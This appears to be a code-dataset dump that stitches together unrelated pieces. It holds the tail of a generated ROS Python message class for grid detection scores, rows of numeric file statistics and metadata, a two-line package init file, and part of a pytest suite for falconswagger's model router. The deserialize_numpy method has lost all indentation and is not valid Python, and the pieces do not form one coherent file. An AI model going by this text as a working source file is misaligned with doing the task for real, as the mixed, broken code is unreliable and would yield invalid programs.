# The starting points for the location search
uint32 minX
uint32 minY
# The strides in the location space
uint32 strideX
uint32 strideY
# The starting points for the scaling
uint32 minW
uint32 minH
# The strides in the w, h space. In this case, we step by growing by a
# fraction, so that width_i is round(minWidth*strideW^i)
float64 strideW
float64 strideH
# True if the width and height should be a consistent aspect ratio that are
# defined by minW and minH. This reduces the grid to (s,x,y)
bool fixAspect
================================================================================
MSG: sensor_msgs/MatND
# A message that contains an uncompressed n dimensional
# matrix. Designed to be compatible with the opencv n-dimensional
# matrix.
Header header
int32[] sizes # The size of each dimension in the matrix
string encoding # The data type see src/image_encodings.cpp
bool is_bigendian # Is the data bigendian?
uint8[] data # The actual data
================================================================================
MSG: std_msgs/Duration
duration data
"""
__slots__ = ['header','grid','scores','mask','processing_time']
_slot_types = ['std_msgs/Header','objdetect_msgs/Grid','sensor_msgs/MatND','sensor_msgs/MatND','std_msgs/Duration']
  def __init__(self, *args, **kwds):
    """
    Constructor. Any message fields that are implicitly/explicitly
    set to None will be assigned a default value. The recommend
    use is keyword arguments as this is more robust to future message
    changes.  You cannot mix in-order arguments and keyword arguments.

    The available fields are:
       header,grid,scores,mask,processing_time

    :param args: complete set of field values, in .msg order
    :param kwds: use keyword arguments corresponding to message field names
    to set specific fields.
    """
    if args or kwds:
      super(DetectGridScores, self).__init__(*args, **kwds)
      #message fields cannot be None, assign default values for those that are
      if self.header is None:
        self.header = std_msgs.msg.Header()
      if self.grid is None:
        self.grid = objdetect_msgs.msg.Grid()
      if self.scores is None:
        self.scores = sensor_msgs.msg.MatND()
      if self.mask is None:
        self.mask = sensor_msgs.msg.MatND()
      if self.processing_time is None:
        self.processing_time = std_msgs.msg.Duration()
    else:
      # No arguments given: initialize every field to its default value.
      self.header = std_msgs.msg.Header()
      self.grid = objdetect_msgs.msg.Grid()
      self.scores = sensor_msgs.msg.MatND()
      self.mask = sensor_msgs.msg.MatND()
      self.processing_time = std_msgs.msg.Duration()
  def _get_types(self):
    """
    internal API method
    """
    # Used by genpy's (de)serialization machinery to look up slot types.
    return self._slot_types
  def serialize(self, buff):
    """
    serialize message into buffer
    :param buff: buffer, ``StringIO``
    """
    try:
      _x = self
      # Header: seq + stamp secs/nsecs as three little-endian uint32.
      buff.write(_struct_3I.pack(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs))
      _x = self.header.frame_id
      length = len(_x)
      if python3 or type(_x) == unicode:
        _x = _x.encode('utf-8')
        length = len(_x)
      # Strings are serialized as a uint32 length prefix plus raw bytes.
      buff.write(struct.pack('<I%ss'%length, length, _x))
      _x = self
      # Grid fields (6 uint32, 2 float64, fixAspect byte) followed by the
      # scores MatND header, packed in one call.
      buff.write(_struct_6I2dB3I.pack(_x.grid.minX, _x.grid.minY, _x.grid.strideX, _x.grid.strideY, _x.grid.minW, _x.grid.minH, _x.grid.strideW, _x.grid.strideH, _x.grid.fixAspect, _x.scores.header.seq, _x.scores.header.stamp.secs, _x.scores.header.stamp.nsecs))
      _x = self.scores.header.frame_id
      length = len(_x)
      if python3 or type(_x) == unicode:
        _x = _x.encode('utf-8')
        length = len(_x)
      buff.write(struct.pack('<I%ss'%length, length, _x))
      # scores.sizes: length-prefixed int32 array.
      length = len(self.scores.sizes)
      buff.write(_struct_I.pack(length))
      pattern = '<%si'%length
      buff.write(struct.pack(pattern, *self.scores.sizes))
      _x = self.scores.encoding
      length = len(_x)
      if python3 or type(_x) == unicode:
        _x = _x.encode('utf-8')
        length = len(_x)
      buff.write(struct.pack('<I%ss'%length, length, _x))
      buff.write(_struct_B.pack(self.scores.is_bigendian))
      _x = self.scores.data
      length = len(_x)
      # - if encoded as a list instead, serialize as bytes instead of string
      if type(_x) in [list, tuple]:
        buff.write(struct.pack('<I%sB'%length, length, *_x))
      else:
        buff.write(struct.pack('<I%ss'%length, length, _x))
      _x = self
      # mask MatND: same layout as scores above.
      buff.write(_struct_3I.pack(_x.mask.header.seq, _x.mask.header.stamp.secs, _x.mask.header.stamp.nsecs))
      _x = self.mask.header.frame_id
      length = len(_x)
      if python3 or type(_x) == unicode:
        _x = _x.encode('utf-8')
        length = len(_x)
      buff.write(struct.pack('<I%ss'%length, length, _x))
      length = len(self.mask.sizes)
      buff.write(_struct_I.pack(length))
      pattern = '<%si'%length
      buff.write(struct.pack(pattern, *self.mask.sizes))
      _x = self.mask.encoding
      length = len(_x)
      if python3 or type(_x) == unicode:
        _x = _x.encode('utf-8')
        length = len(_x)
      buff.write(struct.pack('<I%ss'%length, length, _x))
      buff.write(_struct_B.pack(self.mask.is_bigendian))
      _x = self.mask.data
      length = len(_x)
      # - if encoded as a list instead, serialize as bytes instead of string
      if type(_x) in [list, tuple]:
        buff.write(struct.pack('<I%sB'%length, length, *_x))
      else:
        buff.write(struct.pack('<I%ss'%length, length, _x))
      _x = self
      # processing_time: duration as two int32 (secs, nsecs).
      buff.write(_struct_2i.pack(_x.processing_time.data.secs, _x.processing_time.data.nsecs))
    except struct.error as se: self._check_types(se)
    except TypeError as te: self._check_types(te)
  def deserialize(self, str):
    """
    unpack serialized message in str into this message instance
    :param str: byte array of serialized message, ``str``
    """
    try:
      # Ensure every compound field exists before filling it in.
      if self.header is None:
        self.header = std_msgs.msg.Header()
      if self.grid is None:
        self.grid = objdetect_msgs.msg.Grid()
      if self.scores is None:
        self.scores = sensor_msgs.msg.MatND()
      if self.mask is None:
        self.mask = sensor_msgs.msg.MatND()
      if self.processing_time is None:
        self.processing_time = std_msgs.msg.Duration()
      end = 0
      _x = self
      start = end
      # 12 bytes: header seq + stamp secs/nsecs (three uint32).
      end += 12
      (_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs,) = _struct_3I.unpack(str[start:end])
      start = end
      end += 4
      (length,) = _struct_I.unpack(str[start:end])
      start = end
      end += length
      if python3:
        self.header.frame_id = str[start:end].decode('utf-8')
      else:
        self.header.frame_id = str[start:end]
      _x = self
      start = end
      # 53 bytes: grid (6 uint32 + 2 float64 + fixAspect byte) plus the
      # scores MatND header (three uint32).
      end += 53
      (_x.grid.minX, _x.grid.minY, _x.grid.strideX, _x.grid.strideY, _x.grid.minW, _x.grid.minH, _x.grid.strideW, _x.grid.strideH, _x.grid.fixAspect, _x.scores.header.seq, _x.scores.header.stamp.secs, _x.scores.header.stamp.nsecs,) = _struct_6I2dB3I.unpack(str[start:end])
      self.grid.fixAspect = bool(self.grid.fixAspect)
      start = end
      end += 4
      (length,) = _struct_I.unpack(str[start:end])
      start = end
      end += length
      if python3:
        self.scores.header.frame_id = str[start:end].decode('utf-8')
      else:
        self.scores.header.frame_id = str[start:end]
      start = end
      end += 4
      (length,) = _struct_I.unpack(str[start:end])
      # scores.sizes: length-prefixed int32 array.
      pattern = '<%si'%length
      start = end
      end += struct.calcsize(pattern)
      self.scores.sizes = struct.unpack(pattern, str[start:end])
      start = end
      end += 4
      (length,) = _struct_I.unpack(str[start:end])
      start = end
      end += length
      if python3:
        self.scores.encoding = str[start:end].decode('utf-8')
      else:
        self.scores.encoding = str[start:end]
      start = end
      end += 1
      (self.scores.is_bigendian,) = _struct_B.unpack(str[start:end])
      self.scores.is_bigendian = bool(self.scores.is_bigendian)
      start = end
      end += 4
      (length,) = _struct_I.unpack(str[start:end])
      start = end
      end += length
      if python3:
        self.scores.data = str[start:end].decode('utf-8')
      else:
        self.scores.data = str[start:end]
      _x = self
      start = end
      # mask MatND: same layout as scores above.
      end += 12
      (_x.mask.header.seq, _x.mask.header.stamp.secs, _x.mask.header.stamp.nsecs,) = _struct_3I.unpack(str[start:end])
      start = end
      end += 4
      (length,) = _struct_I.unpack(str[start:end])
      start = end
      end += length
      if python3:
        self.mask.header.frame_id = str[start:end].decode('utf-8')
      else:
        self.mask.header.frame_id = str[start:end]
      start = end
      end += 4
      (length,) = _struct_I.unpack(str[start:end])
      pattern = '<%si'%length
      start = end
      end += struct.calcsize(pattern)
      self.mask.sizes = struct.unpack(pattern, str[start:end])
      start = end
      end += 4
      (length,) = _struct_I.unpack(str[start:end])
      start = end
      end += length
      if python3:
        self.mask.encoding = str[start:end].decode('utf-8')
      else:
        self.mask.encoding = str[start:end]
      start = end
      end += 1
      (self.mask.is_bigendian,) = _struct_B.unpack(str[start:end])
      self.mask.is_bigendian = bool(self.mask.is_bigendian)
      start = end
      end += 4
      (length,) = _struct_I.unpack(str[start:end])
      start = end
      end += length
      if python3:
        self.mask.data = str[start:end].decode('utf-8')
      else:
        self.mask.data = str[start:end]
      _x = self
      start = end
      # 8 bytes: processing_time duration as two int32 (secs, nsecs).
      end += 8
      (_x.processing_time.data.secs, _x.processing_time.data.nsecs,) = _struct_2i.unpack(str[start:end])
      return self
    except struct.error as e:
      raise genpy.DeserializationError(e) #most likely buffer underfill
  def serialize_numpy(self, buff, numpy):
    """
    serialize message with numpy array types into buffer
    :param buff: buffer, ``StringIO``
    :param numpy: numpy python module
    """
    try:
      _x = self
      # Header: seq + stamp secs/nsecs as three little-endian uint32.
      buff.write(_struct_3I.pack(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs))
      _x = self.header.frame_id
      length = len(_x)
      if python3 or type(_x) == unicode:
        _x = _x.encode('utf-8')
        length = len(_x)
      # Strings are serialized as a uint32 length prefix plus raw bytes.
      buff.write(struct.pack('<I%ss'%length, length, _x))
      _x = self
      # Grid fields plus the scores MatND header, packed in one call.
      buff.write(_struct_6I2dB3I.pack(_x.grid.minX, _x.grid.minY, _x.grid.strideX, _x.grid.strideY, _x.grid.minW, _x.grid.minH, _x.grid.strideW, _x.grid.strideH, _x.grid.fixAspect, _x.scores.header.seq, _x.scores.header.stamp.secs, _x.scores.header.stamp.nsecs))
      _x = self.scores.header.frame_id
      length = len(_x)
      if python3 or type(_x) == unicode:
        _x = _x.encode('utf-8')
        length = len(_x)
      buff.write(struct.pack('<I%ss'%length, length, _x))
      length = len(self.scores.sizes)
      buff.write(_struct_I.pack(length))
      pattern = '<%si'%length
      # numpy variant: dump the array's raw bytes instead of struct.pack.
      buff.write(self.scores.sizes.tostring())
      _x = self.scores.encoding
      length = len(_x)
      if python3 or type(_x) == unicode:
        _x = _x.encode('utf-8')
        length = len(_x)
      buff.write(struct.pack('<I%ss'%length, length, _x))
      buff.write(_struct_B.pack(self.scores.is_bigendian))
      _x = self.scores.data
      length = len(_x)
      # - if encoded as a list instead, serialize as bytes instead of string
      if type(_x) in [list, tuple]:
        buff.write(struct.pack('<I%sB'%length, length, *_x))
      else:
        buff.write(struct.pack('<I%ss'%length, length, _x))
      _x = self
      # mask MatND: same layout as scores above.
      buff.write(_struct_3I.pack(_x.mask.header.seq, _x.mask.header.stamp.secs, _x.mask.header.stamp.nsecs))
      _x = self.mask.header.frame_id
      length = len(_x)
      if python3 or type(_x) == unicode:
        _x = _x.encode('utf-8')
        length = len(_x)
      buff.write(struct.pack('<I%ss'%length, length, _x))
      length = len(self.mask.sizes)
      buff.write(_struct_I.pack(length))
      pattern = '<%si'%length
      buff.write(self.mask.sizes.tostring())
      _x = self.mask.encoding
      length = len(_x)
      if python3 or type(_x) == unicode:
        _x = _x.encode('utf-8')
        length = len(_x)
      buff.write(struct.pack('<I%ss'%length, length, _x))
      buff.write(_struct_B.pack(self.mask.is_bigendian))
      _x = self.mask.data
      length = len(_x)
      # - if encoded as a list instead, serialize as bytes instead of string
      if type(_x) in [list, tuple]:
        buff.write(struct.pack('<I%sB'%length, length, *_x))
      else:
        buff.write(struct.pack('<I%ss'%length, length, _x))
      _x = self
      # processing_time: duration as two int32 (secs, nsecs).
      buff.write(_struct_2i.pack(_x.processing_time.data.secs, _x.processing_time.data.nsecs))
    except struct.error as se: self._check_types(se)
    except TypeError as te: self._check_types(te)
def deserialize_numpy(self, str, numpy):
"""
unpack serialized message in str into this message instance using numpy for array types
:param str: byte array of serialized message, ``str``
:param numpy: numpy python module
"""
try:
if self.header is None:
self.header = std_msgs.msg.Header()
if self.grid is None:
self.grid = objdetect_msgs.msg.Grid()
if self.scores is None:
self.scores = sensor_msgs.msg.MatND()
if self.mask is None:
self.mask = sensor_msgs.msg.MatND()
if self.processing_time is None:
self.processing_time = std_msgs.msg.Duration()
end = 0
_x = self
start = end
end += 12
(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs,) = _struct_3I.unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.header.frame_id = str[start:end].decode('utf-8')
else:
self.header.frame_id = str[start:end]
_x = self
start = end
end += 53
(_x.grid.minX, _x.grid.minY, _x.grid.strideX, _x.grid.strideY, _x.grid.minW, _x.grid.minH, _x.grid.strideW, _x.grid.strideH, _x.grid.fixAspect, _x.scores.header.seq, _x.scores.header.stamp.secs, _x.scores.header.stamp.nsecs,) = _struct_6I2dB3I.unpack(str[start:end])
self.grid.fixAspect = bool(self.grid.fixAspect)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.scores.header.frame_id = str[start:end].decode('utf-8')
else:
self.scores.header.frame_id = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%si'%length
start = end
end += struct.calcsize(pattern)
self.scores.sizes = numpy.frombuffer(str[start:end], dtype=numpy.int32, count=length)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.scores.encoding = str[start:end].decode('utf-8')
else:
self.scores.encoding = str[start:end]
start = end
end += 1
(self.scores.is_bigendian,) = _struct_B.unpack(str[start:end])
self.scores.is_bigendian = bool(self.scores.is_bigendian)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.scores.data = str[start:end].decode('utf-8')
else:
self.scores.data = str[start:end]
_x = self
start = end
end += 12
(_x.mask.header.seq, _x.mask.header.stamp.secs, _x.mask.header.stamp.nsecs,) = _struct_3I.unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.mask.header.frame_id = str[start:end].decode('utf-8')
else:
self.mask.header.frame_id = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%si'%length
start = end
end += struct.calcsize(pattern)
self.mask.sizes = numpy.frombuffer(str[start:end], dtype=numpy.int32, count=length)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.mask.encoding = str[start:end].decode('utf-8')
else:
self.mask.encoding = str[start:end]
start = end
end += 1
(self.mask.is_bigendian,) = _struct_B.unpack(str[start:end])
self.mask.is_bigendian = bool(self.mask.is_bigendian)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.mask.data = str[start:end].decode('utf-8')
else:
self.mask.data = str[start:end]
_x = self
start = end
end += 8
(_x.processing_time.data.secs, _x.processing_time.data.nsecs,) = _struct_2i.unpack(str[start:end])
return self
except struct.error as e:
raise genpy.DeserializationError(e) #most likely buffer underfill
_struct_I = genpy.struct_I
_struct_3I = struct.Struct("<3I")
_struct_B = struct.Struct("<B")
_struct_6I2dB3I = struct.Struct("<6I2dB3I")
_struct_2i = struct.Struct("<2i")
| 35.763602
| 272
| 0.625433
| 2,700
| 19,062
| 4.260741
| 0.107407
| 0.076495
| 0.059284
| 0.044332
| 0.755911
| 0.751912
| 0.726182
| 0.723053
| 0.716273
| 0.707406
| 0
| 0.012231
| 0.232242
| 19,062
| 532
| 273
| 35.830827
| 0.77383
| 0.078691
| 0
| 0.806867
| 1
| 0.002146
| 0.15934
| 0.024766
| 0
| 0
| 0.000575
| 0
| 0
| 1
| 0.012876
| false
| 0
| 0.015021
| 0
| 0.049356
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
9d90277b5d6a0a43ae86f051ea8f839ec2cbb0c6
| 68
|
py
|
Python
|
celertix/configs/__init__.py
|
BALAVIGNESHDOSTRIX/celertix-framework
|
a3d9a530431cbdecf9686fe34fbe3c8d3265327e
|
[
"MIT"
] | 2
|
2020-12-19T14:17:25.000Z
|
2021-08-03T10:20:21.000Z
|
celertix/configs/__init__.py
|
BALAVIGNESHDOSTRIX/celertix-framework
|
a3d9a530431cbdecf9686fe34fbe3c8d3265327e
|
[
"MIT"
] | 12
|
2021-02-08T21:02:14.000Z
|
2022-03-12T00:52:27.000Z
|
celertix/configs/__init__.py
|
BALAVIGNESHDOSTRIX/celertix-framework
|
a3d9a530431cbdecf9686fe34fbe3c8d3265327e
|
[
"MIT"
] | 1
|
2021-04-08T15:32:32.000Z
|
2021-04-08T15:32:32.000Z
|
from . import celertix_dbconfig
from . import celertix_module_config
| 34
| 36
| 0.867647
| 9
| 68
| 6.222222
| 0.666667
| 0.357143
| 0.642857
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.102941
| 68
| 2
| 36
| 34
| 0.918033
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
d19da063a4cd8370784e0f371920df5e37dfcfaf
| 18,222
|
py
|
Python
|
tests/unit/base/models/test_base.py
|
dutradda/falcon-swagger
|
aaba9175817b18662194dc67091e31ec70664012
|
[
"MIT"
] | 14
|
2016-11-01T17:57:09.000Z
|
2021-03-09T12:43:38.000Z
|
tests/unit/base/models/test_base.py
|
dutradda/falcon-swagger
|
aaba9175817b18662194dc67091e31ec70664012
|
[
"MIT"
] | 1
|
2016-11-30T13:08:56.000Z
|
2017-01-16T00:13:40.000Z
|
tests/unit/base/models/test_base.py
|
dutradda/falcon-swagger
|
aaba9175817b18662194dc67091e31ec70664012
|
[
"MIT"
] | 5
|
2016-11-01T16:24:09.000Z
|
2018-06-06T01:20:57.000Z
|
# MIT License
# Copyright (c) 2016 Diogo Dutra
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from falconswagger.models.orm.redis_base import ModelRedisBaseMeta, ModelRedisBase
from falconswagger.router import ModelRouter
from falconswagger.exceptions import ModelBaseError
from falcon.errors import HTTPNotFound, HTTPMethodNotAllowed
from jsonschema import ValidationError
from unittest import mock
import pytest
class TestModelBaseErrors(object):
def test_without_schema_and_without_key(self):
model = ModelRedisBaseMeta('TestModel', (ModelRedisBase,), {})
assert model.__key__ == 'test'
assert not hasattr(model, '__schema__')
def test_without_schema_and_with_key(self):
model = ModelRedisBaseMeta('TestModel', (ModelRedisBase,), {'__key__': 'test123'})
assert model.__key__ == 'test123'
def test_with_schema_without_operation_id(self):
schema = {
'/test': {
'post': {
'responses': {'200': {'description': 'test'}}
}
}
}
with pytest.raises(ValidationError) as exc_info:
ModelRedisBaseMeta('TestModel', (ModelRedisBase,), {'__schema__': schema})
assert exc_info.value.message == "'operationId' is a required property"
def test_with_schema_with_operation_with_parameters_with_invalid_operationId(self):
schema = {
'/test': {
'post': {
'responses': {'200': {'description': 'test'}},
'operationId': 'test',
'parameters': [{
'name': 'test',
'in': 'query',
'type': 'array'
}]
}
}
}
with pytest.raises(ModelBaseError) as exc_info:
ModelRedisBaseMeta('TestModel', (ModelRedisBase,), {'__schema__': schema})
assert exc_info.value.args[0] == "'operationId' 'test' was not found"
def test_raises_method_not_allowed_error(self):
schema = {
'/test': {
'post': {
'responses': {'200': {'description': 'test'}},
'operationId': 'post_by_body',
'parameters': [{
'name': 'test',
'in': 'query',
'type': 'array'
}]
}
}
}
req = mock.MagicMock(path='/test', method='GET')
model = ModelRedisBaseMeta('TestModel', (ModelRedisBase,), {'__schema__': schema})
router = ModelRouter()
router.add_model(model)
with pytest.raises(HTTPMethodNotAllowed) as exc_info:
route, _ = router.get_route_and_params(req)
assert exc_info.value.headers == {'Allow': 'POST, OPTIONS'} or \
exc_info.value.headers == {'Allow': 'OPTIONS, POST'}
class TestModelBaseBuildsQueryStringParameters(object):
def test_if_operation_builds_query_string_parameters_with_array_without_items_as_string(self):
schema = {
'/test': {
'post': {
'responses': {'200': {'description': 'test'}},
'operationId': 'post_by_body',
'parameters': [{
'name': 'test',
'in': 'query',
'type': 'array'
}]
}
}
}
model = ModelRedisBaseMeta('TestModel', (ModelRedisBase,), {'__schema__': schema})
model.insert = mock.MagicMock(return_value=[{}])
req = mock.MagicMock(
context={'session': mock.MagicMock()},
params={'test': '1,2,3,4'},
path='/test',
method='POST')
req.get_header.return_value = None
resp = mock.MagicMock()
router = ModelRouter()
router.add_model(model)
route, _ = router.get_route_and_params(req)
route(req, resp)
kwargs_expected = {'test': ['1', '2', '3', '4']}
assert model.insert.call_args_list == [
mock.call(req.context['session'], req.context['parameters']['body'], **kwargs_expected)
]
def test_if_operation_builds_query_string_parameters_with_array_without_items_as_list(self):
schema = {
'/test': {
'post': {
'responses': {'200': {'description': 'test'}},
'operationId': 'post_by_body',
'parameters': [{
'name': 'test',
'in': 'query',
'type': 'array'
}]
}
}
}
model = ModelRedisBaseMeta('TestModel', (ModelRedisBase,), {'__schema__': schema})
model.insert = mock.MagicMock(return_value=[{}])
req = mock.MagicMock(
context={'session': mock.MagicMock()},
params={'test': ['1', '2', '3', '4']},
path='/test',
method='POST')
req.get_header.return_value = None
resp = mock.MagicMock()
router = ModelRouter()
router.add_model(model)
route, _ = router.get_route_and_params(req)
route(req, resp)
kwargs_expected = {'test': ['1', '2', '3', '4']}
assert model.insert.call_args_list == [
mock.call(req.context['session'], req.context['parameters']['body'], **kwargs_expected)
]
def test_if_operation_builds_query_string_parameters_with_array_with_items_as_string(self):
schema = {
'/test': {
'post': {
'responses': {'200': {'description': 'test'}},
'operationId': 'post_by_body',
'parameters': [{
'name': 'test',
'in': 'query',
'type': 'array',
'items': {}
}]
}
}
}
model = ModelRedisBaseMeta('TestModel', (ModelRedisBase,), {'__schema__': schema})
model.insert = mock.MagicMock(return_value=[{}])
req = mock.MagicMock(
context={'session': mock.MagicMock()},
params={'test': '1,2,3,4'},
path='/test',
method='POST')
req.get_header.return_value = None
resp = mock.MagicMock()
router = ModelRouter()
router.add_model(model)
route, _ = router.get_route_and_params(req)
route(req, resp)
kwargs_expected = {'test': ['1', '2', '3', '4']}
assert model.insert.call_args_list == [
mock.call(req.context['session'], req.context['parameters']['body'], **kwargs_expected)
]
def test_if_operation_builds_query_string_parameters_with_array_with_items_with_type_as_list(self):
schema = {
'/test': {
'post': {
'responses': {'200': {'description': 'test'}},
'operationId': 'post_by_body',
'parameters': [{
'name': 'test',
'in': 'query',
'type': 'array',
'items': {'type': 'number'}
}]
}
}
}
model = ModelRedisBaseMeta('TestModel', (ModelRedisBase,), {'__schema__': schema})
model.insert = mock.MagicMock(return_value=[{}])
req = mock.MagicMock(
context={'session': mock.MagicMock()},
params={'test': ['1', '2', '3', '4']},
path='/test',
method='POST')
req.get_header.return_value = None
resp = mock.MagicMock()
router = ModelRouter()
router.add_model(model)
route, _ = router.get_route_and_params(req)
route(req, resp)
kwargs_expected = {'test': [1., 2., 3., 4.]}
assert model.insert.call_args_list == [
mock.call(req.context['session'], req.context['parameters']['body'], **kwargs_expected)
]
def test_if_operation_builds_query_string_parameters_with_array_with_items_with_type_as_string(self):
schema = {
'/test': {
'post': {
'responses': {'200': {'description': 'test'}},
'operationId': 'post_by_body',
'parameters': [{
'name': 'test',
'in': 'query',
'type': 'array',
'items': {'type': 'number'}
}]
}
}
}
model = ModelRedisBaseMeta('TestModel', (ModelRedisBase,), {'__schema__': schema})
model.insert = mock.MagicMock(return_value=[{}])
req = mock.MagicMock(
context={'session': mock.MagicMock()},
params={'test': '1,2,3,4'},
path='/test',
method='POST')
req.get_header.return_value = None
resp = mock.MagicMock()
router = ModelRouter()
router.add_model(model)
route, _ = router.get_route_and_params(req)
route(req, resp)
kwargs_expected = {'test': [1., 2., 3., 4.]}
assert model.insert.call_args_list == [
mock.call(req.context['session'], req.context['parameters']['body'], **kwargs_expected)
]
class TestModelBaseBuildsUriTemplateParameters(object):
def test_if_operation_builds_uri_template_parameters_with_array_without_items_as_string(self):
schema = {
'/test': {
'get': {
'responses': {'200': {'description': 'test'}},
'operationId': 'get_by_uri_template',
'parameters': [{
'name': 'test',
'in': 'path',
'required': True,
'type': 'array'
}]
}
}
}
model = ModelRedisBaseMeta('TestModel', (ModelRedisBase,), {'__schema__': schema})
model.get = mock.MagicMock(return_value=[{}])
req = mock.MagicMock(
context={'session': mock.MagicMock()},
path='/test',
method='GET')
req.get_header.return_value = None
resp = mock.MagicMock()
router = ModelRouter()
router.add_model(model)
route, _ = router.get_route_and_params(req)
route(req, resp, **{'test': '1,2,3,4'})
kwargs_expected = {'test': ['1', '2', '3', '4']}
assert model.get.call_args_list == [
mock.call(req.context['session'], kwargs_expected)
]
def test_if_operation_builds_uri_template_parameters_with_array_with_items_as_string(self):
schema = {
'/test': {
'get': {
'responses': {'200': {'description': 'test'}},
'operationId': 'get_by_uri_template',
'parameters': [{
'name': 'test',
'in': 'path',
'required': True,
'type': 'array',
'items': {}
}]
}
}
}
model = ModelRedisBaseMeta('TestModel', (ModelRedisBase,), {'__schema__': schema})
model.get = mock.MagicMock(return_value=[{}])
req = mock.MagicMock(
context={'session': mock.MagicMock()},
path='/test',
method='GET')
req.get_header.return_value = None
resp = mock.MagicMock()
router = ModelRouter()
router.add_model(model)
route, _ = router.get_route_and_params(req)
route(req, resp, **{'test': '1,2,3,4'})
kwargs_expected = {'test': ['1', '2', '3', '4']}
assert model.get.call_args_list == [
mock.call(req.context['session'], kwargs_expected)
]
def test_if_operation_builds_uri_template_parameters_with_array_with_items_with_type_as_string(self):
schema = {
'/test': {
'get': {
'responses': {'200': {'description': 'test'}},
'operationId': 'get_by_uri_template',
'parameters': [{
'name': 'test',
'in': 'path',
'required': True,
'type': 'array',
'items': {'type': 'number'}
}]
}
}
}
model = ModelRedisBaseMeta('TestModel', (ModelRedisBase,), {'__schema__': schema})
model.get = mock.MagicMock(return_value=[{}])
req = mock.MagicMock(
context={'session': mock.MagicMock()},
path='/test',
method='GET')
req.get_header.return_value = None
resp = mock.MagicMock()
router = ModelRouter()
router.add_model(model)
route, _ = router.get_route_and_params(req)
route(req, resp, **{'test': '1,2,3,4'})
kwargs_expected = {'test': [1., 2., 3., 4.]}
assert model.get.call_args_list == [
mock.call(req.context['session'], kwargs_expected)
]
class TestModelBaseBuildsHeadersParameters(object):
def test_if_operation_builds_headers_parameters_with_array_without_items_as_string(self):
schema = {
'/test': {
'post': {
'responses': {'200': {'description': 'test'}},
'operationId': 'post_by_body',
'parameters': [{
'name': 'test',
'in': 'header',
'type': 'array'
}]
}
}
}
model = ModelRedisBaseMeta('TestModel', (ModelRedisBase,), {'__schema__': schema})
model.insert = mock.MagicMock(return_value=[{}])
req = mock.MagicMock(
context={'session': mock.MagicMock()},
path='/test',
method='POST')
req.get_header.return_value = '1,2,3,4'
resp = mock.MagicMock()
router = ModelRouter()
router.add_model(model)
route, _ = router.get_route_and_params(req)
route(req, resp)
kwargs_expected = {'test': ['1', '2', '3', '4']}
assert req.get_header.call_args_list == [mock.call('test')]
assert model.insert.call_args_list == [
mock.call(req.context['session'], req.context['parameters']['body'], **kwargs_expected)
]
def test_if_operation_builds_headers_parameters_with_array_with_items_as_string(self):
schema = {
'/test': {
'post': {
'responses': {'200': {'description': 'test'}},
'operationId': 'post_by_body',
'parameters': [{
'name': 'test',
'in': 'header',
'type': 'array',
'items': {}
}]
}
}
}
model = ModelRedisBaseMeta('TestModel', (ModelRedisBase,), {'__schema__': schema})
model.insert = mock.MagicMock(return_value=[{}])
req = mock.MagicMock(
context={'session': mock.MagicMock()},
path='/test',
method='POST')
req.get_header.return_value = '1,2,3,4'
resp = mock.MagicMock()
router = ModelRouter()
router.add_model(model)
route, _ = router.get_route_and_params(req)
route(req, resp)
kwargs_expected = {'test': ['1', '2', '3', '4']}
assert model.insert.call_args_list == [
mock.call(req.context['session'], req.context['parameters']['body'], **kwargs_expected)
]
def test_if_operation_builds_headers_parameters_with_array_with_items_with_type_as_string(self):
schema = {
'/test': {
'post': {
'responses': {'200': {'description': 'test'}},
'operationId': 'post_by_body',
'parameters': [{
'name': 'test',
'in': 'header',
'type': 'array',
'items': {'type': 'number'}
}]
}
}
}
model = ModelRedisBaseMeta('TestModel', (ModelRedisBase,), {'__schema__': schema})
model.insert = mock.MagicMock(return_value=[{}])
